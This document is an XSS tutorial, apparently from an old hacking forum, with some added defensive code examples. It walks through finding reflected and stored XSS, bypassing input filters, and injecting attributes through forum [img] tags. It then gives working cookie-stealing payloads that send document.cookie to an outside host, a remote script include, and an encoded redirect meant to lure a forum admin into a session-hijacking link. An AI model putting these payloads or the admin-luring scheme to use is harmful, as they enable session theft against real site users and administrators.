
XSS Description from A to Z.



  • XSS is CSS => Cross Site Scripting
  • How to use XSS
  • What is an XSS attack?
  • What are passive and active XSS?
  • So, specifically: how to find XSS on a site
  • And how to determine whether there is a filter?
  • Active XSS
  • So far we have only been writing test payloads like
  • How do we put this into a link with XSS?


  • XSS is CSS => Cross Site Scripting

    The abbreviation is XSS rather than CSS so that it is not confused with Cascading Style Sheets (CSS).
    This bug class first appeared in 1997.



    How to use XSS.


    First we need to know what a cookie is.
    If you already know, skip ahead.

    Cookies are small records a site stores in the visitor's browser; the one that matters here is the session cookie that tells the site who you are.
    If you registered on the site under the nickname 'blabluble' and logged in, the site saved a cookie in your browser that identifies your session.
    If you are an admin with access to the site, and I am the user who stole your (admin) cookies, then I can calmly visit the site with your cookie set and the site will identify me as 'admin': I get administrator rights without ever knowing your password. In current terminology this is session hijacking.

    To substitute the stolen cookies, use the CookieEdit program for IE or the built-in cookie editors in Opera and Firefox (today the developer tools of any browser will do).

    To intercept cookies, you need to find a place on the site where an XSS attack is possible.


    What is an XSS attack?


    XSS attacks are not attacks on the site itself but on the site's users: the injected script runs in the victim's browser, with the rights of the vulnerable site.
    XSS is a flaw in the application's input filtering and output encoding.

    There are passive XSS and active XSS.

    What are passive and active XSS?


    Passive XSS (today called reflected XSS) requires the victim's direct participation, and comes with specific limitations and difficulties.
    For that reason passive XSS is valued less.
    For example, you need to make the victim follow a poisoned link, which requires social engineering and cunning.

    Active XSS (today called stored or persistent XSS) requires no extra action from the victim: she only has to open a page that contains your injected code, and the JavaScript runs automatically.
    Because it works without any help from the victim, it is very useful and valuable.
    For example, active XSS lives in BB tags when a forum, guestbook or chat filters messages insufficiently; the payload is stored with the message and fires every time the page is loaded.




    So, specifically: how to find XSS on a site.


    As I wrote earlier, XSS is built out of tags, that is out of HTML, plus the JavaScript language =).

    JavaScript can be embedded in HTML.
    It can also be encoded to bypass filters. More on that later.

    How do you find out whether a given site has XSS?
    The best-known probe is
    <script>alert()</script> . We try to insert this script into every field we can find; if an alert box pops up, the script was passed through and executed.

    The most common XSS (seen everywhere filtering is poor):

    "><script>alert()</script>

    The whole point is in the "> .

    Let's think about what happens when we type "><script>alert()</script> into a field.

    The form value is assigned to a variable and then written back into the page, typically inside an attribute such as <input value="...">. The " closes the attribute value, the > closes the tag, and

    what follows, <script>alert()</script>, is now ordinary page markup and is executed.

    This XSS is most common in site search forms, because the search term is echoed back into the page:

    We go through all the fields of the site and try to insert "><script>alert()</script>
    If an alert appears, you have found XSS...
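    The attribute breakout described above, as an added example that is not part of the original article: a toy search page reflects the query into an <input value="..."> attribute, first verbatim and then attribute-encoded, and a small walker checks whether a <script tag ended up outside any attribute value. The page markup and the function names are assumptions made for illustration.

```javascript
// Added example, not from the original article: a toy search page that
// reflects the query into an <input value="..."> attribute. The page
// markup and the function names are assumptions for illustration.

// The probe from the article: "> closes the attribute value and the tag.
const PROBE = '"><script>alert()</script>';

// Minimal HTML attribute encoder: the characters that can change HTML
// structure become entities, so the browser treats them as text.
function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable: the query is pasted verbatim into value="...".
function renderSearchVulnerable(query) {
  return '<form action="/search">' +
         '<input name="q" value="' + query + '">' +
         '<input type="submit" value="Search">' +
         '</form>';
}

// Hardened: same markup, but the query is attribute-encoded first.
function renderSearchSafe(query) {
  return '<form action="/search">' +
         '<input name="q" value="' + encodeAttr(query) + '">' +
         '<input type="submit" value="Search">' +
         '</form>';
}

// A rough version of what the tester does by eye: does a <script tag
// start anywhere outside a double-quoted attribute value? We walk the
// markup once and track whether we are inside a tag and inside quotes.
// (Heuristic only: it does not handle single-quoted attributes or comments.)
function hasScriptOutsideAttributes(html) {
  let inTag = false;
  let inQuote = false;
  for (let i = 0; i < html.length; i++) {
    const c = html[i];
    if (inTag && c === '"') { inQuote = !inQuote; continue; }
    if (inQuote) continue;
    if (c === '<') {
      inTag = true;
      if (html.slice(i, i + 7).toLowerCase() === '<script') return true;
    } else if (c === '>') {
      inTag = false;
    }
  }
  return false;
}

// Stand-alone demo: compare what the two pages do with the probe.
console.log('vulnerable:', renderSearchVulnerable(PROBE));
console.log('  script escaped the attribute?', hasScriptOutsideAttributes(renderSearchVulnerable(PROBE)));
console.log('safe:      ', renderSearchSafe(PROBE));
console.log('  script escaped the attribute?', hasScriptOutsideAttributes(renderSearchSafe(PROBE)));
```

    Run it with node; the vulnerable page prints value=""><script>alert()</script>">, i.e. the script sits in the page body, while the safe page keeps the whole probe inside the attribute as &quot;&gt;&lt;script&gt;... . The fix is output encoding for the context the value lands in, not a blocklist of dangerous strings.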




    And how to determine whether there is a filter?


    Just enter into any field: '';!--"<#########>=&{()}
    Then open the page's HTML source, search for the word "#########"
    and look at the characters around it.

    If < > came back as they were, that is the first sign of vulnerability: the filter has a hole.
    If " ' \ came back as they were entered, that is the second sign of vulnerability: these are extra characters you can use in a later XSS attack (for example to break out of an attribute value).
    If < > are simply missing from the HTML, the filter strips instead of encoding; there is very likely still a hole (see below).
    If < > were replaced by other characters (&lt; and &gt;), that is a bummer: the filter is at
    least functioning normally.
    You can also enter a check string like this into the field: "><>'"`,/\?@%

    Consider the case where the filter eats < >.

    In this case there is still a chance of a hole.
    For example, suppose the filter's rule is to eat <script>, < > and the word javascript.
    Then try an unterminated tag with a split-up scheme, for instance <IMG SRC="java script:alert();" (without a closing >).

    The filter sees nothing dangerous in <IMG SRC="java script:alert(); , lets it through, the browser closes the tag on its own and thereby
    executes the script.

    A note on the gap in java script: the browsers of that era (IE) ignored a tab or newline inside the scheme name, so java<TAB>script: ran while a filter looking for the literal javascript: missed it. A literal space never worked. Current browsers still strip tabs and newlines from URLs, so the same trick survives as java&#x09;script: inside an attribute.

    Of course, if the filter does not handle different encodings, you can try encoding the script and pasting the encoded form.

    Everything has to be tried by trial and error...
    Enter things into the fields and look carefully at what comes back from the filter.
    Poke at it until you understand how the filter works and whether it has flaws.
    If the filter is bad, we can always insert scripts.
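    The filter check above, automated, as an added example that is not part of the original article: the probe is sent with a unique marker in place of the #########, the marker is located in the returned HTML, and each special character around it is reported as preserved, stripped or entity-encoded, which maps onto the article's verdicts. The marker zq7probe, the entity table and the three sample responses are all constructed for illustration, not captured from any site.

```javascript
// Added example, not from the original article: automating the "is there a
// filter?" check. We submit the article's probe with a unique marker in
// place of the #########, then find the marker in the returned HTML and
// work out what happened to each special character around it. The three
// sample responses at the bottom are constructed, not captured from any site.

const MARKER = 'zq7probe';
const FILTER_PROBE = `'';!--"<${MARKER}>=&{()}`;

// Entity spellings a filter commonly emits for each special character.
const ENTITIES = {
  '<': ['&lt;', '&#60;', '&#x3c;'],
  '>': ['&gt;', '&#62;', '&#x3e;'],
  '"': ['&quot;', '&#34;', '&#x22;'],
  "'": ['&#39;', '&#x27;', '&apos;'],
  '&': ['&amp;', '&#38;', '&#x26;'],
};

function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// One regex for the whole probe: every special character becomes a capture
// group that accepts the raw character, one of its entity forms, or nothing
// (the filter stripped it). Every other character must match verbatim.
function buildProbeRegex() {
  const order = [];
  let src = '';
  for (const c of FILTER_PROBE) {
    if (ENTITIES[c]) {
      order.push(c);
      src += '(' + [c, ...ENTITIES[c]].map(escapeRe).join('|') + '|)';
    } else {
      src += escapeRe(c);
    }
  }
  return { re: new RegExp(src, 'i'), order };
}

// Weakest treatment wins when a character appears more than once.
const RANK = { preserved: 0, stripped: 1, encoded: 2 };

function classifyFilter(html) {
  if (!html.includes(MARKER)) return { reflected: false };
  const { re, order } = buildProbeRegex();
  const m = re.exec(html);
  if (!m) return { reflected: true, modelled: false }; // altered in a way we do not model
  const chars = {};
  order.forEach((c, i) => {
    const got = m[i + 1];
    const t = got === '' ? 'stripped' : got === c ? 'preserved' : 'encoded';
    if (!(c in chars) || RANK[t] < RANK[chars[c]]) chars[c] = t;
  });
  return { reflected: true, modelled: true, chars };
}

// Turn the per-character result into the article's verdicts.
function verdict(result) {
  if (!result.reflected) return 'input not reflected';
  if (!result.modelled) return 'reflected but transformed in an unmodelled way';
  const c = result.chars;
  const notes = [];
  if (c['<'] === 'preserved' && c['>'] === 'preserved') notes.push('angle brackets survive: tag injection likely');
  else if (c['<'] === 'stripped' || c['>'] === 'stripped') notes.push('angle brackets stripped: try unterminated tags and encoding bypasses');
  else notes.push('angle brackets entity-encoded: filter is functioning');
  if (c['"'] === 'preserved' || c["'"] === 'preserved') notes.push('quotes survive: attribute breakout may be possible');
  return notes.join('; ');
}

// Constructed sample responses: no filter, a stripping filter, an encoding filter.
const NO_FILTER = `<input name="q" value="'';!--"<zq7probe>=&{()}">`;
const STRIPPING = `<input name="q" value="'';!--"zq7probe=&{()}">`;
const ENCODING  = `<p>Results for &#39;&#39;;!--&quot;&lt;zq7probe&gt;=&amp;{()}</p>`;

for (const [name, html] of [['no filter', NO_FILTER], ['stripping', STRIPPING], ['encoding', ENCODING]]) {
  console.log(name + ':', verdict(classifyFilter(html)));
}
```

    The regex approach lets the filter treat each character differently (strip the angle brackets but keep the quotes, say) without enumerating every combination by hand; if the site mangles the probe in some other way (replacing < with a space, truncating the value) the result is reported as unmodelled rather than guessed.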




    Active XSS


    Here you work with the tags the site allows and close them, so that the HTML they expand into is completed by your payload.

    For example the url, bb and img tags.
    The whole point of the insertion is that we embed our payload in the img or url parameter. img has many attributes besides src and alt.
    This bug is very often used on forums and in guestbooks...

    Let's consider active XSS.

    Warning!!!

    The tags [fon*t], [im*g], [ur*l] are written with * so that the site does not interpret them in this text.
    To use these tags, remove the *.

    For example, let's look at a forum for use of the tags [fon*t], [im*g], [ur*l] and try to insert a script into them or combine them:

    [im*g]http://www.qwewqw.ru/1.jpg[/im*g]  A broken-image icon (the "cross") appears... so img is in use and we have picked it up (it happens that img is enabled even though the admins removed it from the message editor and say you cannot insert pictures; it can then be used
    in different forms). If there is no cross and the whole string just sits there as text, try again like this:
    [im*g src=http://www.qwewqw.ru/1.jpg]

    Suppose we got a cross with this:
    [im*g]http://www.qweqw.ru/1.jpg[/im*g]

    Check whether the filter tolerates a space by adding one after the jpg extension:
    [im*g]http://www.qweqw.ru/1.jpg [/im*g]
    If the cross is still there, everything is OK.

    Next, img has the dynsrc and lowsrc attributes, which can hold javascript. (Both were Internet Explorer extensions; current browsers ignore them, so today the same attribute injection would target an event handler such as onerror instead.) For example, we try to insert:
    [im*g]http://www.qwewqw.ru/1.jpg dynsrc=java script:alert()[/im*g]
    check, send; if an alert appears, you have found an active XSS, and instead of alert() you can insert any script.

    If the filter does not give in, try this:
    [im*g]http://www.qweqw.ru/"/dynsrc="java script:alert()"/1.jpg[/im*g]
    and
    [im*g]http://www.qwewqw.ru/"/dynsrc=java script:alert()/1.jpg[/im*g]

    If one of the given examples produces a cross, replace http://www.qweqw.ru/1.jpg with the address of your sniffer (the cookie-logging script).

    Sometimes the admin has disabled the img tag altogether.
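    The [img] attribute injection above, seen from the forum's side, as an added example that is not part of the original article: a naive BBCode converter drops the text between the tags into an unquoted src, so the space followed by dynsrc=... becomes a second attribute, while a hardened converter parses the URL, allows only http(s), and writes a quoted, attribute-encoded src. The converters and the sample post are constructed for illustration.

```javascript
// Added example, not from the original article: how a forum's BBCode [img]
// tag can be turned into HTML. The first converter is the naive kind the
// article's payloads rely on; the second validates and encodes the URL.
// The converters and the sample post are constructed for illustration.

// The article's payload: an extra attribute smuggled inside the image URL.
const POST = '[img]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/img]';

// Naive: whatever sits between the tags lands in an unquoted src attribute,
// so a space followed by name=value becomes a second attribute.
function bbcodeImgNaive(text) {
  return text.replace(/\[img\]([\s\S]*?)\[\/img\]/gi, (whole, url) => '<img src=' + url + '>');
}

function encodeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Accept only absolute http(s) URLs; the WHATWG parser normalises the rest
// (spaces and quotes in the path come back percent-encoded).
function safeImageUrl(raw) {
  let u;
  try { u = new URL(raw.trim()); } catch (e) { return null; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return null;
  return u.href;
}

// Hardened: quoted, attribute-encoded src; anything that is not a plain
// http(s) URL is shown as literal text instead of becoming a tag.
function bbcodeImgSafe(text) {
  return text.replace(/\[img\]([\s\S]*?)\[\/img\]/gi, (whole, raw) => {
    const url = safeImageUrl(raw);
    return url ? '<img src="' + encodeAttr(url) + '">' : encodeAttr(whole);
  });
}

console.log('naive:', bbcodeImgNaive(POST));
console.log('safe: ', bbcodeImgSafe(POST));
console.log('safe, javascript: scheme:', bbcodeImgSafe('[img]javascript:alert()[/img]'));
```

    The naive output is <img src=http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()>, two attributes; the hardened output keeps the whole string inside one quoted src (the space becomes %20), and a bare javascript: URL is rejected and left as text. Quoting plus encoding is what stops the breakout; the scheme allowlist is what stops javascript: in the image source itself.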




    So far we have only been writing test payloads like:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg and so on...
    They bring no benefit by themselves; they are just codes for checking (testing) for XSS.

    Here is the script:
    <script>
    // Load an "image" from the attacker's server; the browser sends the
    // request, and the cookie rides along in the query string.
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?" + document.cookie;
    </script>
    This one already steals cookies =)
    Caveat: a cookie set with the HttpOnly flag is not visible to document.cookie, so this payload cannot read it; the request still goes out, but with an empty or partial cookie string.




    How do we put this into a link with XSS?


    Yes, very easy...
    There are several options:

    - 1) do it like this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script> where ***** is the site with XSS.

    Here is the assembled script itself:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can also do it like this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> which references http://haknet.h16.ru/script/js.js

    and js.js contains:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; this method is more reliable (the link stays short, and the script can be changed later without touching the link).

    But as I already wrote, sometimes there are difficulties with filters on the site (our script does not get through).
    Then you need to think about how to get around it.
    You can simply add something, change something, or delete something in the script.
    But there is a more reliable option: we just encode the script. There are many programs for this.
    There is a site such as http://ha.ckers.org/xss.html (encoder-decoder).

    Here is an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    this is the encoded form of:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Encoding is needed not only to fool filters but also to fool the ADMIN when using PASSIVE XSS.

    Here is an example based on social engineering.
    We make contact with the forum administrator, post a link to our site on the forum, and say something like "there's a cool feature on this site" and so on in the same vein.
    And on our site there is, you guessed it =), this script:

    <script language="JavaScript">
    // Send the visitor on to the encoded XSS link as soon as the page loads.
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do, you ask? )) .. it is JavaScript that sends the browser to the specified address without any click. So we gave the link to the admin, he went to our site, and from there he is immediately thrown to

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E which is our XSS in encoded form.

    Caveat: current browsers do not percent-decode the scheme, so an address that begins %68%74%74%70%3A is treated as a relative path on our own site, not as http://. Encode only the parameter value (everything after p=) and leave http://*****.ru/free?p= readable; the server decodes the parameter either way.

    Note: this only works when the XSS is on the site whose admin we sent the link to...
    In other words, the DIFFICULTY of PASSIVE XSS is that the vulnerability can be exploited ONLY if the victim is AUTHORIZED (logged in) on the vulnerable site!!!
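    Why the encoded link from option 3 gets past a filter, as an added example that is not part of the original article: a blocklist applied to the raw query string never sees <script, because every byte is %XX, while the application's query parser decodes the value back to the original payload. The encoder reproduces the article's encoded string exactly; the blocklist filter and the handler order are assumptions for illustration.

```javascript
// Added example, not from the original article: why percent-encoding the
// payload gets past a filter that looks at the raw URL, and where a filter
// would have to sit to see what the application sees. The blocklist
// "filter" and the handler order are assumptions for illustration; the
// encoded string is the one from the article (with the stray spaces removed).

const PAGE_URL = "http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>";
const PAGE_ENCODED =
  '%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74' +
  '%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74' +
  '%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E';

// Encode every character as %XX, the way the article's encoder does
// (ASCII input only, which is all the payload contains).
function percentEncodeAll(s) {
  return Array.from(s, ch => '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

// A naive blocklist applied to the raw query string, before URL decoding.
function rawQueryLooksMalicious(rawQuery) {
  return /<script|javascript:/i.test(rawQuery);
}

// What the application actually receives for ?p=...: the decoded value.
function decodedParam(rawQuery, name) {
  return new URLSearchParams(rawQuery).get(name);
}

// The same blocklist applied after decoding, i.e. to what the app sees.
function decodedParamLooksMalicious(rawQuery, name) {
  const v = decodedParam(rawQuery, name);
  return v !== null && /<script|javascript:/i.test(v);
}

// The payload part of the article's link, plain and encoded.
const PAYLOAD = "'><script src=http://haknet.h16.ru/script/js.js></script>";
const plainQuery = 'p=' + PAYLOAD;
const encodedQuery = 'p=' + percentEncodeAll(PAYLOAD);

console.log('raw filter, plain  :', rawQueryLooksMalicious(plainQuery));
console.log('raw filter, encoded:', rawQueryLooksMalicious(encodedQuery));
console.log('app sees           :', decodedParam(encodedQuery, 'p'));
console.log('decoded filter     :', decodedParamLooksMalicious(encodedQuery, 'p'));
```

    Moving the check after decoding closes this particular gap, but a blocklist stays a blocklist: the durable fix for the site is to encode p for the HTML context it is written into, as in the search-form example earlier on this page.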